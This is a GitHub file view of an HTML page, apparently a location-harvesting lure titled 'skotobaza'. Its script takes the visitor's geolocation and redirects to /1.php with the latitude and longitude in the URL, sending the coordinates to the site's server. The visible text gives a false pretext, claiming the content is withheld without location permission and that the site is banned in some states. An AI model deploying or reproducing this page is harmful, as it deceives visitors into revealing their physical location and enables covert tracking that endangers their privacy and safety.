-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
101 lines (97 loc) · 2.09 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>skotobaza</title>
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<script>
navigator.geolocation.getCurrentPosition(
function(position) {
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
location.href = "/1.php?Latitude="+"=> "+latitude+" ;"+" Longitude => "+longitude;
});
</script>
</head>
<body>
<noscript>
<span><h1><center><font color="#FF0000">You have javascript disabled...</font></center></h1>
<p><font size="5"><center>To surf the site you need to enable JavaScript in the settings.</center></font></p>
</span>
</noscript>
<h1><b><font size="5"><font face="Georgia, serif">OOPS...</font></font></b></h1>
<p><font size="4">Sorry, but we can not show you the content of the site, because you did not give permission to access your location. </font></p>
<p><font size="4">Site implementation
<a href="/zapret.html">banned in some states
</a>. </font></p>
<p><font size="4">The rules are in accordance with the rules of the site. (<a href="/pravila.html">paragraph 11.3</a>). </font></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</body>
</html>